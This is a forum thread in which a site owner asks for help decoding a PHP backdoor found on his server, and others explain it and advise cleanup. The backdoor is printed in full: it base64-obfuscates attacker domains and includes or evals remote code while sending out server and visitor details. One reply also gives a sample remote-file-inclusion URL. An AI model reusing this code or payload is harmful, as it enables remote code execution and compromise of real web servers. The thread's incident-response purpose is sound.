Decoding a attack

[Suchy]

I found this in a file (174584.php) on my server in a folder that is set to 777, most likely it is some kind of attack. Can you guys help me decode it, what does this attack do and how it works?

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

[phpretard]

Another FTP attack - your computer is compromised by a malware, your FTP password stolen, and this backdoor uploaded to the server. Check your computer.

 

[littledragon]

include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8="

 

is attempting to include an external file.  This is usually done by saving a php file on their own server with the extension gif so that it gets served out as-is and including it from your server..  all this 'base64_decode' is trying to hide the address of their server from you

 

I have some experience of this... you need to change ALL your passwords, including for any other users on your server.  Even once you've done that, check all your scripts for security vulnerabilities since people may have been snooping your source code and could take advantage of it.  Make sure no files include $include which is set by $include = $_GET['section'] since this can easily be attacked (yoursite.com?section=http://theirsite.com/dodgyinclude.gif), make sure register_globals is off, and keep a close eye on things for a while

 

I was got by a keylogger in an internet cafe in Brasil (I guess, since the attacks I got afterward were in Portuguese)

[littledragon]

And oh, yes check your own computer too

[Suchy]

How can I check it, they won't let me inside the server farm 

 

Any way I changed passwords, and deleated the file, what else should I watchout for?

 

PS. thanks for the helpfull responses

 

 

[mlin]

check your computer means run virus/malware scans to try to get rid of anything you don't want.

 

Advanced users don't usually think they know what an infected system looks like (zero-day exploits, etc...), but if you know what a Clean system should look like...you can catch most garbage manually using hijackThis (ask google)

 

Or, you could Abandon winblows for a better platform debian, ubuntu, and gNewSense all rock. All free of fee, but gNewSense is completely free as in speech. Have a look around. They're all also easy to dual boot so that you can dev on a *nix system, and still have winblows there for your games.